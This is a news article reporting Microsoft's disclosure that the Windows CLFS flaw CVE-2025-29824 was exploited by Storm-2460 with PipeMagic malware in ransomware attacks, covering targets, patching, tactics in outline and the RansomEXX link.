In recent news, Microsoft has disclosed that a security vulnerability affecting the Windows Common Log File System (CLFS) was exploited by threat actors in ransomware attacks targeting specific organizations. These targets include entities in the information technology (IT) and real estate sectors in the United States, the financial sector in Venezuela, a Spanish software company, and the retail sector in Saudi Arabia.
The specific vulnerability, identified as CVE-2025-29824, is a privilege escalation flaw within CLFS that could be used to achieve SYSTEM privileges. Fortunately, Microsoft released a patch for this vulnerability as part of its Patch Tuesday update for April 2025, effectively addressing the issue.
The exploit related to CVE-2025-29824 has been named Storm-2460 by Microsoft, with threat actors utilizing a malware called PipeMagic to deliver the exploit and subsequently deploy ransomware payloads. The attackers have been observed using the certutil utility to download malware from a compromised third-party site as part of their tactics.
The malware involved in these attacks is an MSBuild file containing an encrypted payload that unpacks and executes PipeMagic, a trojan detected in the wild since 2022. Interestingly, this is not the first time PipeMagic has been associated with Windows zero-day vulnerabilities, as a previous flaw (CVE-2025-24983) was also exploited using this malware.
It’s worth noting that Windows 11, version 24H2, is not vulnerable to the exploitation of CVE-2025-29824, as access to certain System Information Classes within NtQuerySystemInformation is restricted to users with SeDebugPrivilege. This limitation ensures that only admin-like users can obtain such privileges, preventing unauthorized exploitation.
Following successful exploitation of the vulnerability, threat actors can extract user credentials by dumping LSASS memory and encrypt files on the system with random extensions. While Microsoft was unable to analyze a ransomware sample from these attacks, the ransom note left behind indicated a connection to the RansomEXX ransomware family.
In conclusion, Microsoft emphasized the value that threat actors place on post-compromise elevation of privilege exploits, as these can enable them to escalate initial access and pivot to privileged access within targeted environments. This escalation ultimately facilitates the widespread deployment of ransomware, underscoring the need for robust cybersecurity measures to defend against such threats.
As the cybersecurity landscape continues to evolve, it is crucial for organizations to stay vigilant and implement comprehensive security protocols to mitigate the risk of falling victim to ransomware attacks and other advanced threats. Stay tuned for more updates on this developing story.